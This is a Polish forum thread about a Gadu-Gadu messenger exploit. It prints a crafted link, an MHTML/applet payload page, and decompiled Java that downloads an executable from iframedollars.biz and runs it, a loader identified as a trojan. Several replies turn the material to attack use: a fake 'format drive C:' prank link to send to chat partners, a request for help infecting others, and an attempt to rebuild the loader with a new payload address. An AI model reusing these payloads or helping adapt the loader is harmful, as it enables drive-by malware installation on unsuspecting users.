Exploit GG

jakoppo

Użytkownik
Dołączył
Październik 14, 2004
Posty
75
Witam!!
Przytocze tekst i jak ktos wie więcej na ten temat to proszę zeby sie wypowiedział:

www.po"style=background-image:url(java script:window.open('http://iframedollars.biz/dl/adv407.php','','left=10000'));".pl

Plik adv407.php zawierał następujący kod html:

<div class='htmltop'>HTML</div><div class='htmlmain'>[head]
[/head][body]
[textarea id="cxw" style="display:none;"]
[object data="${PR}" type="text/x-scriptlet"][/object]
[/textarea]

[script language="javascript"]
document.write(cxw.value.replace(/${PR}/g,'ms-its:mhtml:file://c:nosuch.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm'));
[/script]
[applet width=1 height=1 ARCHIVE=loaderadv407.jar
code=Counter][/APPLET][/body]</div>

Po ściągnięciu i zdekompilowaniu loaderadv407.jar, zauważyłem czym to jest:

URL url1 = new URL("http://iframedollars.biz/dl/loadadv407.exe");
URLConnection urlconnection = url1.openConnection();
[...]
FileOutputStream fileoutputstream = new FileOutputStream(s4 + "loadnew.exe");
[...]
as[0] = s4 + "loadnew.exe";
Process process = Runtime.getRuntime().exec(as);

Clamav rozpoznał binarke jako Trojan.Qhost.O.


POZDRO!!
 

Bozuch

Użytkownik
Dołączył
Czerwiec 6, 2004
Posty
49
Dont kapuje tego co piszesz ale hyba hodzi ci o dziure w GG
jezeli hcesz cos zrobic to ci powiem musis se pogadac z kims i jezeli hcesz cos od tej dzury to 1 sposub musisz dac linka z kodem java scrip
nP:www.kod_javy_scrip.pl i wysylasz
 

haX^

Użytkownik
Dołączył
Październik 25, 2004
Posty
60
ja robie swoje archiwum jara ale nie wiem jak sie infekuje ta wiadomoscia =x need help
 

Bozuch

Użytkownik
Dołączył
Czerwiec 6, 2004
Posty
49
dam ci linka z takim o czyms
system windows wynaga...
sam se sprawdz
www.po"style=background-image:url(java script:document.write('%3cscript%3ealert%28%22system%20windows%20wymaga%20natychmiastowego%20sformatowania%20dysku%20C:%22%29%3c%2fscript%3e'));".pl
rozmawiasz se popprostu z kims i walniesz mu linka i masz grzaba jezeli kompa se formatnie
<
 

jakoppo

Użytkownik
Dołączył
Październik 14, 2004
Posty
75
Witam chcialem spytac co znaczy ze cytuje:

rozmawiasz se popprostu z kims i walniesz mu linka i masz grzaba jezeli kompa se formatnie

Co to jest grzab??
 

rywin

Użytkownik
Dołączył
Kwiecień 22, 2003
Posty
237
No Bozuch on ma racje. Ty wogole nie w temacie jestes. Oni podali przyklad (nie ich autorstwa) wykozystania tego samego bugu co ty. Ale u nich chodzi o uruchomienie exe a nie wyswietlenie komunikatu.
 

grave

Użytkownik
Dołączył
Sierpień 16, 2003
Posty
138
A propo: Udało się komuś przerobić te pliki javy pd windowsem?
Ja rozpakowałem plik loaderadv407.jar, zdekompilowałem plik Matrix.class za pomocą DJ Java Decompiler do Matrix.jad. Następnie zmieniłem tylko adres do pliku, który ma się odpalić i zapisałem jako plik Matrix.java. Potem za pomocą Java SDK (plik javac.exe) spróbowałem skompilować go z powortem do pliku class i wyskoczyło 9 błędów. Ktoś wie, jak to poprawnie skompilować? A może coś już zepsułem dekompilując złym programem? A jeśli brakuje mi jakichś plików to skąd je ściągnąć?
 

WalgO

Użytkownik
Dołączył
Czerwiec 11, 2004
Posty
495
bozuch to w ogóle nawija jakimś slangiem jak by był ostro usmażony i nie wiedział totalnie ocb
<
 

dinko

Użytkownik
Dołączył
Luty 10, 2005
Posty
1
ciekawe...

jak wchodze na ten topic to firewall wyświetla mi ten komunikat:C:DOCUMENTS AND SETTINGSADMINISTRATORUSTAWIENIA LOKALNETEMPORARY INTERNET FILESCONTENT.IE5AH4PCRY1POSTING[1].HTM

Contains signature of the HTML script virus HTML/Exploit.Mhtml

twórca tego topica cos kręci
<
 

SZKOD[nick]

Były Moderator
Dołączył
Maj 2, 2003
Posty
808
Re: ciekawe...

Originally posted by dinko
jak wchodze na ten topic to firewall wyświetla mi ten komunikat:C:DOCUMENTS AND SETTINGSADMINISTRATORUSTAWIENIA LOKALNETEMPORARY INTERNET FILESCONTENT.IE5AH4PCRY1POSTING[1].HTM

Contains signature of the HTML script virus HTML/Exploit.Mhtml

twórca tego topica cos kręci :lol:
po prostu to co jest w treści posta jest i w źródle a jeśli jest tam to po przeskanowaniu znalał znaleziony znajomy kod z "Contains signature of the HTML script virus HTML/Exploit.Mhtml"
 

kiela

Użytkownik
Dołączył
Czerwiec 21, 2004
Posty
230
Originally posted by jakoppo
Plik adv407.php zawierał następujący kod html:

<div class='htmltop'>HTML
<div class='htmlmain'>[head]
[/head][body]
[textarea id="cxw" style="display:none;"]
[object data="${PR}" type="text/x-scriptlet"][/object]
[/textarea]

[script language="javascript"]
document.write(cxw.value.replace(/${PR}/g,'ms-its:mhtml:file://c:nosuch.mht!http://iframedollars.biz/dl/adv407/x.chm::/x.htm'));
[/script]
[applet width=1 height=1 ARCHIVE=loaderadv407.jar
code=Counter][/APPLET][/body]</div>
[/quote]

ten plik php nie zawiera tylko tyle
ten fragment to jest odpowiedz na skrypt php czyli plik adv407.php moze zawierac jeszcze wiele innych funkcji ktorych nie zobaczysz bo nie zostaja wyswietlane
<
 
Do góry Bottom